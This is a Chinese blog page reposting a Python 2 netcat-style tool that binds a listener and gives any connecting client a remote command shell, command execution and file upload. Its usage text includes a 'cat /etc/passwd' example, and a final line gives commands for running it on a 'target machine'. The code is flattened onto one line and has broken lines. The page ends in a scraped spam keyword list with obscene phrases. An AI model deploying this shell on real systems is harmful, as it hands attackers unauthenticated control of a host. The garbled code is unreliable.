程序博客网 > 伊藤润二坏小孩知乎

仿netcat,手写tcp通道,创建监听拥有命令行权限!

来源:互联网 发布:伊藤润二坏小孩知乎 编辑:程序博客网 时间:2024/04/30 02:35
# -*- coding: utf-8 -*-__author__ = 'wangjingyao'import sysimport socketimport getoptimport threadingimport subprocess#定义一些全局变量listen  = Falsecommand = Falseupload = Falseexecute = ""target = ""upload_destination = ""port = 0# 说明文档def usage():    print "BHP Net Tool"    print    print "Usage: bhpnet.py -t target_host -p port"    print "-l --listen    -listen on [host]:[port] for incoming connections"    print "-e --execute =file_to_run  -execute the given file upon receiving a connection"    print "-c --command  - initialize a command shell"    print " -u --upload = destination  -upon receiving connection upload a file an write to [destination]"    print    print    print "Example :"    print "bhpnet.py -t 192.168.0.1 -p 5555 -l  -c"    print "bhpnet.py -t 192.168.0.1 -p 5555 -l -u=c:\\target.exe"    print "bhpnet.py -t 192.168.0.1 -p 5555 -l -e =\"cat /etc/passwd\""    print "echo 'ABCDEFGHI' | ./bhpnet.py -t 192.168..11.12 -p 135"    sys.exit(0)def run_command(command):    #换行    command=command.rstrip()    print "---------------command",command    #运行命令行并将输出返回    try:        output=subprocess.check_output(command,stderr=subprocess.STDOUT,shell=True)    except:        output+"Failed to execute command.\r\n"    # 将数据发送    return  output#实现文件上传,命令执行,shell相关功能def client_handler(client_socket):    global  upload    global execute    global  command    #测试上传文件    if len(upload_destination):            #读取所有的字符并写下目标            file_buffer=""            #持续读取数据直到没有符合的数据            while True:                data = client_socket.recv(1024)                if not data:                    break                else:                    file_buffer+=data            #现在我们接收这些数据并将它们写出来            try:                file_descriptor = open(upload_destination,"wb")                file_descriptor.write(file_buffer)                file_descriptor.close()                #确认文件已经写出来                client_socket.send("Successfully saved file to %s\r\n" % upload_destination)            except:                client_socket.send("Failed to save file to %s\r\n" % upload_destination)    #检查命令执行    if len(execute):        #运行命令        output = run_command(execute)        client_socket.send(output)    #如果需要一个命令行shell,那么我们进入另一个循环    if command:        while True:            #跳出一个窗口            client_socket.send("<BHP:#> ")            #现在我们接受文件知道发现换行符            cmd_buffer=""            while "\n" not in cmd_buffer:                cmd_buffer+=client_socket.recv(1024)                #返还命令输出                response=run_command(cmd_buffer)                #返回相应数据                client_socket.send(response)# 服务器端主循环和子函数def server_loop():    global target    #如果没有定义目标,那么我们监听所有的接口    if not len(target):        target="0.0.0.0"    server = socket.socket(socket.AF_INET,socket.SOCK_STREAM)    print target,port    server.bind((target,port))    server.listen(5)    while True:        client_socket,addr=server.accept()        #分拆一个线程处理新的客户端        client_thread=threading.Thread(target=client_handler,args=(client_socket,))        client_thread.start()def client_sender(buffer):    client = socket.socket(socket.AF_INET,socket.SOCK_STREAM)    try:        # 链接到目标主机        client.connect((target,port))        if len(buffer):            client.send(buffer)        while True:            # 现在等待数据回传            recv_len =1            response=""            while recv_len:                data = client.recv(4096)                recv_len=len(data)                response+=data                if recv_len<4096:                    break            print response,            # 等待更多的输入            buffer=raw_input("")            buffer+="\n"            # 发送出去            client.send(buffer)    except:        print "[*] Exception Exiting."        #关闭链接        client.close()# 创建主函数处理命令行参数和调用我们编写的其他函数def main():    global listen    global port    global execute    global command    global upload_destination    global  target    if not len(sys.argv[1:]):        usage()    # 读取命令行选项    try:        opts,args = getopt.getopt(sys.argv[1:],"hle:t:p:cu:",["help","listen","execute","target","port","command","upload"])    except getopt.GetoptError as err:        print str(err)        usage()    for o,a in opts:        if o in ("-h","--help"):            usage()        elif o in ("-l","--listen"):            listen =True        elif o in ("-e","--execute"):            execute =a        elif o in ("-c","--commandshell"):            command=True        elif o in ("-u","--upload"):            upload_destination =a        elif o in ("-t","--target"):            target=a        elif o in ("-p","--port"):            port=int(a)        else:            assert False,"Unhadled Option"     # 我们是进行监听还是仅从标准输入发送数据    if not listen and len(target) and port > 0:            # 从命令行读取内存数据            # 这里将阻塞,所以不再向标准输入发送数据时发送 CTRL-D            buffer = sys.stdin.read()            # 发送数据            client_sender(buffer)    #我们开始监听并准备上传文件,执行命令,放置一个反弹shell,取决于上面的命令行选项    if listen:        server_loop()main()
目标靶机:windows cmd : python bhpnet.py -l -t 192.168.180.XXX -p 9999 -c 
客户端: windows cmd: python bhpnet.py -t 192.168.180.XXX -p 9999
0 0
伊藤润二坏小孩知乎 伊藤润二坏小孩知乎
原创粉丝点击
热门IT博客
蓝牙小车控制app源码蓝牙小车控制app源码
年轻人怎样理财知乎年轻人怎样理财知乎
数控程序员培训
php获取物理地址
二手app软件排名
UG中编程中D是什么意思
有道英语软件下载
数据员的工作内容
pr是什么软件
gdb linux是什么意思
组态软件控制系统
tor网络原理文章
索尼a7和a6300 知乎
c语言程序入门教材
java dwg转pdf
孩子王 知乎
linux 线程通信效率
linux c 字符串拷贝
网络推广 推荐书籍
淘宝买家秀兼职怎么做
热门问题 老师的惩罚 人脸识别 我在镇武司摸鱼那些年 重生之率土为王 我在大康的咸鱼生活 盘龙之生命进化 天生仙种 凡人之先天五行 春回大明朝 姑娘不必设防,我是瞎子 梦见在公厕上厕所 城市公厕设计规范 公厕快题设计 公厕管理制度 城市公厕设计标准 移动公厕图片 公共厕所图片 公共厕所平面图 厕所平面图 公共洗手间 菜市场开放式公厕在线 县开放式简陋公厕超清播放 加油站的精液公厕 国军老兵蜗居公厕 3d全彩雯雅婷人肉公厕 县城开放式简陋公厕超清 移动公司女士上公厕 足球队长被改造成万人公厕 秦公六号大墓 无敌雷公号 川号子烧鸡公 一公升92号汽油等于多少公斤 天公一号疝气带价格 拳头公司 sm公司 宜人贷公司 公司是什么 什么是公司 公司介绍 公司英语 介绍公司 公司资料 公司图片 公司名大全 信息公司 大公司 我公司 内蒙古公司 南京公司 厦门公司 热门公司

程序博客网,程序员的互联网技术博客家园。csdn论坛精品 msdn技术资料都在这里